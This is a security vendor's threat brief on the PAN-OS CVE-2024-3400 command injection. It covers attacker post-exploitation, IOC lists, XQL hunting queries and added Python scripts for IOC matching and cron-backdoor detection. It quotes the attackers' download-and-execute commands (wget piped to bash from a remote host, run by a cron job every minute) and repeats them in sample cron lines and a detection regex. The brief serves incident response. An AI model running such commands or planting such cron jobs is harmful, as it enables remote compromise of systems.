Title: Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)

URL Source: https://unit42.paloaltonetworks.com/cve-2024-3400

Published Time: April 12, 2024

This post is also available in: [日本語 (Japanese)](https://unit42.paloaltonetworks.jp/cve-2024-3400/)

Executive Summary
-----------------

**This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.**

Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.

A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access.

For up-to-date information about affected products and versions, please refer to the [Palo Alto Networks Security Advisory](https://security.paloaltonetworks.com/CVE-2024-3400) on this issue. Additionally, [episode 21 of the Unit 42 podcast Threat Vector](https://thecyberwire.com/podcasts/threat-vector/21/notes) covers the discovery, technical details and exploitation of the vulnerability.

Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Third parties have disclosed proofs of concept for this vulnerability. We are also aware of a proof of concept including post-exploit persistence techniques that survive resets and upgrades.
We are not aware of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability at this time.

We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse. The section [Current Scope of the Attack](https://unit42.paloaltonetworks.com/cve-2024-3400#post-133365-_50343o6a6han) includes information on the types of exploitation activity we have seen, as well as their relative prevalence.

The vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability and some compromises of PAN-OS that are limited to confirming that the device is exploitable. Other cases have included the following activity:

* Limited attempts in which a file on the hard drive has been copied to a location accessible via a web request
* A very limited number of compromises that led to interactive command execution

This threat brief will cover information about the vulnerability and what we know about post-exploitation activity. We will share guidance to mitigate the vulnerability, though readers should also refer to the [Security Advisory](https://security.paloaltonetworks.com/CVE-2024-3400) for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available.

If you believe your firewall has been compromised, please reach out to [Palo Alto Networks support](https://support.paloaltonetworks.com/).

This issue is fixed in [hotfix releases](https://security.paloaltonetworks.com/CVE-2024-3400) of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3 and all later PAN-OS versions. Hotfixes for other commonly deployed maintenance releases are also available.
Additional guidance on mitigation for customers is available in the [Security Advisory](https://security.paloaltonetworks.com/CVE-2024-3400). A Knowledge Base article, [How to Remedy CVE-2024-3400](https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u000000CrO6CAK), is available in the Customer Support Portal.

As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity.

We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s [blog](https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400) for their analysis.

Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways:

* Customers with a Threat Prevention subscription can block attacks for this vulnerability using Threat ID [95187](https://threatvault.paloaltonetworks.com/?query=95187), [95189](https://threatvault.paloaltonetworks.com/?query=95189) and [95191](https://threatvault.paloaltonetworks.com/?query=95191) (available in Applications and Threats content version 8836-8695 and later).
* [Our advisory has been updated](https://security.paloaltonetworks.com/CVE-2024-3400) with new Threat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400.
* To apply the Threat IDs, customers must ensure that vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant [LIVEcommunity article](https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184) for more information.
* The [Managed Threat Hunting](https://unit42.paloaltonetworks.com/cve-2024-3400#post-133365-_vgezw6a4uez) section below includes XQL queries that can be used to search for signs of exploitation of this CVE.

Details of the Vulnerability
----------------------------

A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both).

Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed.

Current Scope of the Attack
---------------------------

Palo Alto Networks has classified observations of attempted exploitation into several levels, from Level 0 to Level 3. In all cases we recommend following the guidance in the [Security Advisory](https://security.paloaltonetworks.com/CVE-2024-3400).

**Level 0: Probe –** An unsuccessful exploitation attempt. Forensic artifacts indicate that the attempt was made to access the customer network, but the attacker did not actually succeed. Palo Alto Networks assesses there is likely _little to no_ immediate impact of a Level 0 attempt.

**Level 1: Test –** The vulnerability was being tested on the device. A 0-byte file has been created and is resident on the firewall. However, there is no indication of any known unauthorized command execution.

**Level 2: Potential Exfiltration –** A file on the device has been copied to a location accessible via a web request, though the file may or may not have been subsequently downloaded. Typically, the file we have observed being copied is `running_config.xml`.

**Level 3: Interactive Access –** There are signs of interactive command execution.
This may include shell-based backdoors, introduction of code, downloading files or running commands.

It is important to note that _the vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability and some Level 1 compromises of PAN-OS_. Other cases have included limited Level 2 and very limited Level 3 compromises of those targeted firewalls.

UPSTYLE and Cron Job Backdoor Activity
--------------------------------------

As part of the activity observed in Operation MidnightEclipse, the threat actor exploited CVE-2024-3400 to run commands on the firewall. We have determined that the threat actor initially intended to install a Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE. We believe the threat actors created UPSTYLE specifically for this campaign. However, the threat actors were unsuccessful at installing UPSTYLE after three different exploit attempts. After the third failed attempt, the threat actor decided to install a cron job backdoor to carry out their post-exploitation activities.

After failing to install UPSTYLE, the threat actor was observed exploiting CVE-2024-3400 to run a handful of commands on the firewall. The commands included copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files. The following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe is a VPN used by the threat actor:

* `66.235.168[.]222`

After gathering configuration files, the threat actor exploited the vulnerability to run the following command to receive additional commands from an external server in the form of a bash script:

* `wget -qO- hxxp://172.233.228[.]93/patch|bash`

We were unable to access the bash script hosted at this URL. However, shortly afterward we saw evidence of the creation of a cron job.
This cron job would run every minute to access commands hosted on the same external server that would execute via bash, as seen in the following command:

* `wget -qO- hxxp://172.233.228[.]93/policy | bash`

We were unable to access the commands executed via this URL, but we believe this cron job-based backdoor was used to carry out the actor’s post-exploitation activities.

While the threat actors were unable to install the UPSTYLE backdoor, it appears that they created it specifically for this campaign and planned on using it as the initial backdoor. The reasons the actors failed to install UPSTYLE included mistakes in the exploit attempts themselves, as well as trivial mistakes in the executed commands. While we have not seen UPSTYLE used in any other exploit attempts, it is possible that UPSTYLE could have been successfully installed on other devices.

As previously mentioned, the threat actors made three unsuccessful exploit attempts to run commands to install UPSTYLE. For two of these attempts, UPSTYLE was hosted at `hxxp://144.172.79[.]92/update.py`. In the third exploit attempt, we saw the actor hosting the backdoor at `nhdata.s3-us-west-2.amazonaws[.]com`, which may suggest that the actors thought network-based protections caused the first two failed installation attempts.

According to the following HTTP headers, it appears that the threat actor last modified UPSTYLE hosted at `144.172.79[.]92` on April 7, 2024:
```http
Accept-Ranges: bytes
Content-Length: 5187
Content-Type: application/octet-stream
Date: Thu, 11 Apr 2024 16:12:16 GMT
Etag: "6612443d-1443"
Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT
Server: nginx/1.18.0 (Ubuntu)
```
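The three headers above can be cross-checked against each other. nginx builds its default ETag as the file's modification time and size, each in hexadecimal and joined by a hyphen, so the ETag can be decoded offline and compared with Last-Modified and Content-Length; agreement between them is what supports the April 7 modification date. The following Python script is an added example, not part of the Unit 42 post: it embeds the quoted headers as the constant `RAW_HEADERS`, makes no network request, and the function names are this example's own.

```python
"""Cross-check the nginx response headers quoted in the post (added example).

nginx's default ETag is "<hex mtime>-<hex size>" of the served file, so it
can be decoded and compared with Last-Modified and Content-Length without
touching the server. RAW_HEADERS is the header block quoted in the post.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

RAW_HEADERS = """\
Accept-Ranges: bytes
Content-Length: 5187
Content-Type: application/octet-stream
Date: Thu, 11 Apr 2024 16:12:16 GMT
Etag: "6612443d-1443"
Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT
Server: nginx/1.18.0 (Ubuntu)
"""


def parse_headers(raw: str) -> dict:
    """Parse 'Name: value' lines into a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.splitlines():
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def decode_nginx_etag(etag: str):
    """Decode an nginx-style ETag "<hex mtime>-<hex size>" (surrounding quotes optional)."""
    mtime_hex, _, size_hex = etag.strip('"').partition("-")
    mtime = datetime.fromtimestamp(int(mtime_hex, 16), tz=timezone.utc)
    return mtime, int(size_hex, 16)


def check_consistency(raw: str) -> dict:
    """Decode the ETag and report whether it agrees with Last-Modified and Content-Length."""
    h = parse_headers(raw)
    etag_mtime, etag_size = decode_nginx_etag(h["etag"])
    last_modified = parsedate_to_datetime(h["last-modified"])  # aware UTC datetime
    content_length = int(h["content-length"])
    return {
        "etag_mtime": etag_mtime,
        "etag_size": etag_size,
        "last_modified": last_modified,
        "content_length": content_length,
        "mtime_matches": etag_mtime == last_modified,
        "size_matches": etag_size == content_length,
    }


if __name__ == "__main__":
    for key, value in check_consistency(RAW_HEADERS).items():
        print(f"{key:>16}: {value}")
```

Decoding `6612443d-1443` yields 2024-04-07 06:59:09 UTC and 5187 bytes, which matches the Last-Modified and Content-Length headers exactly; the Date header shows the response was captured four days later. A mismatch here would be a reason to doubt the Last-Modified value, since the ETag is derived from the file's metadata on disk rather than copied from the other header.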
Managed Threat Hunting
----------------------

The following XQL queries can be used to search for signs of exploitation of this CVE.

```xql
// Description: Search for domain IOC in raw NGFW logs
dataset = panw_ngfw_url_raw
| filter url_domain ~= ".*nhdata.s3-us-west-2.amazonaws.com"
| fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid
```
```xql
// Description: Detect hits for the specific prevention signature for CVE-2024-3400
config case_sensitive = false
| dataset = panw_ngfw_threat_raw
| filter threat_id in (95187,95189,95191)
| fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip, source_port, dest_ip, dest_port, *
```
```xql
// Description: Hits for known IOCs in NGFW traffic
config case_sensitive = false
| dataset = panw_ngfw_traffic_raw
| filter source_ip in ("110.47.250.103","126.227.76.24","38.207.148.123","147.45.70.100","199.119.206.28","38.181.70.3","149.28.194.95","78.141.232.174","38.180.128.159","64.176.226.203","38.180.106.167","173.255.223.159","38.60.218.153","185.108.105.110","146.70.192.174","149.88.27.212","154.223.16.34","38.180.41.251","203.160.86.91","45.121.51.2","172.233.228.93","66.235.168.222","144.172.79.92") or dest_ip in ("110.47.250.103","126.227.76.24","38.207.148.123","147.45.70.100","199.119.206.28","38.181.70.3","149.28.194.95","78.141.232.174","38.180.128.159","64.176.226.203","38.180.106.167","173.255.223.159","38.60.218.153","185.108.105.110","146.70.192.174","149.88.27.212","154.223.16.34","38.180.41.251","203.160.86.91","45.121.51.2","172.233.228.93","66.235.168.222","144.172.79.92")
| fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid, session_end_reason
```
```xql
// Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW)
config case_sensitive = false
| dataset = xdr_data
| filter event_type = ENUM.STORY
| filter dst_action_external_hostname ~=".*nhdata.s3-us-west-2.amazonaws.com" OR dns_query_name ~=".*nhdata.s3-us-west-2.amazonaws.com" OR action_external_hostname ~=".*nhdata.s3-us-west-2.amazonaws.com" OR action_remote_ip in ("110.47.250.103","126.227.76.24","38.207.148.123","147.45.70.100","199.119.206.28","38.181.70.3","149.28.194.95","78.141.232.174","38.180.128.159","64.176.226.203","38.180.106.167","173.255.223.159","38.60.218.153","185.108.105.110","146.70.192.174","149.88.27.212","154.223.16.34","38.180.41.251","203.160.86.91","45.121.51.2","172.233.228.93","66.235.168.222","144.172.79.92")
| fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_external_hostname
```
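The XQL queries above only run inside the Cortex data lake, so they cannot be exercised on a workstation. The following Python script is an added example, not part of the Unit 42 post and not XQL: it applies the same indicator matching to a handful of constructed NGFW-style records, and it also checks constructed crontab lines for the download-and-execute shape (`wget -qO- <url> | bash`, scheduled every minute) that the UPSTYLE and Cron Job Backdoor Activity section describes, so it serves both that section and the hunting queries. The IOC IPs and domain are the ones used in the queries; every log record and crontab line is constructed, the field names merely mimic the XQL fields, and the function names are this example's own.

```python
"""Offline stand-in for the XQL hunting queries plus a cron-backdoor check (added example).

The IOC list is the one from the hunting queries in this post. SAMPLE_RECORDS and
SAMPLE_CRON_LINES are constructed for the demonstration; real input would be
firewall/XDR exports or the crontab files collected from a device under review.
"""
import re

# Indicators copied from the hunting queries in this post.
IOC_IPS = {
    "110.47.250.103", "126.227.76.24", "38.207.148.123", "147.45.70.100",
    "199.119.206.28", "38.181.70.3", "149.28.194.95", "78.141.232.174",
    "38.180.128.159", "64.176.226.203", "38.180.106.167", "173.255.223.159",
    "38.60.218.153", "185.108.105.110", "146.70.192.174", "149.88.27.212",
    "154.223.16.34", "38.180.41.251", "203.160.86.91", "45.121.51.2",
    "172.233.228.93", "66.235.168.222", "144.172.79.92",
}
IOC_DOMAINS = {"nhdata.s3-us-west-2.amazonaws.com"}

# Constructed NGFW-style records (field names mimic the XQL fields; internal and
# non-indicator addresses are made up).
SAMPLE_RECORDS = [
    {"_time": "2024-04-11T16:10:03Z", "source_ip": "10.1.5.20", "dest_ip": "172.233.228.93",
     "dest_port": 80, "url_domain": ""},
    {"_time": "2024-04-11T16:11:40Z", "source_ip": "10.1.5.20", "dest_ip": "198.51.100.7",
     "dest_port": 443, "url_domain": "example.com"},
    {"_time": "2024-04-11T16:12:55Z", "source_ip": "66.235.168.222", "dest_ip": "203.0.113.10",
     "dest_port": 443, "url_domain": ""},
    {"_time": "2024-04-11T16:14:02Z", "source_ip": "10.1.5.21", "dest_ip": "198.51.100.23",
     "dest_port": 443, "url_domain": "nhdata.s3-us-west-2.amazonaws.com"},
]

# Constructed crontab lines: one benign, one shaped like the backdoor described in
# the post, one download-and-execute entry that points at a non-indicator host.
SAMPLE_CRON_LINES = [
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "* * * * * wget -qO- http://172.233.228.93/policy | bash",
    "*/5 * * * * curl -s https://updates.example.com/check.sh | sh",
]

# "wget ... | bash" or "curl ... | sh": fetched content piped straight into a shell.
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:wget|curl)\b[^|;&]*\|\s*(?:ba)?sh\b")
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def domain_is_ioc(domain: str) -> bool:
    """Exact or subdomain match against the IOC domain list."""
    return any(domain == d or domain.endswith("." + d) for d in IOC_DOMAINS)


def match_iocs(records):
    """Counterpart of the traffic/url queries: flag records that touch a known indicator."""
    hits = []
    for rec in records:
        matched_on = []
        if rec.get("source_ip") in IOC_IPS:
            matched_on.append("source_ip")
        if rec.get("dest_ip") in IOC_IPS:
            matched_on.append("dest_ip")
        if domain_is_ioc(rec.get("url_domain", "")):
            matched_on.append("url_domain")
        if matched_on:
            hits.append({"_time": rec["_time"], "matched_on": matched_on})
    return hits


def parse_cron_line(line: str):
    """Split a crontab entry into its five schedule fields and the command, or None."""
    if line.lstrip().startswith("#"):
        return None
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return parts[:5], parts[5]


def find_download_exec_cron(lines):
    """Flag cron entries that pipe a download into a shell, noting schedule and IOC hits."""
    findings = []
    for line in lines:
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        if not DOWNLOAD_EXEC_RE.search(command):
            continue
        findings.append({
            "line": line,
            "every_minute": all(field == "*" for field in schedule),
            "known_ioc": bool(set(IPV4_RE.findall(command)) & IOC_IPS),
        })
    return findings


if __name__ == "__main__":
    for hit in match_iocs(SAMPLE_RECORDS):
        print("IOC hit:", hit)
    for finding in find_download_exec_cron(SAMPLE_CRON_LINES):
        print("cron finding:", finding)
```

Two points about the design: the cron check keys on the download-into-shell shape rather than on the indicator addresses alone, so an entry that fetches from a host not yet on the list is still surfaced (with `known_ioc` false) for an analyst to look at, while an every-minute schedule plus a listed address reproduces the pattern the post describes. The record matcher, like the XQL, treats source and destination separately, which is what distinguishes the inbound access from `66.235.168[.]222` to the copied configuration file from the outbound fetches to `172.233.228[.]93`.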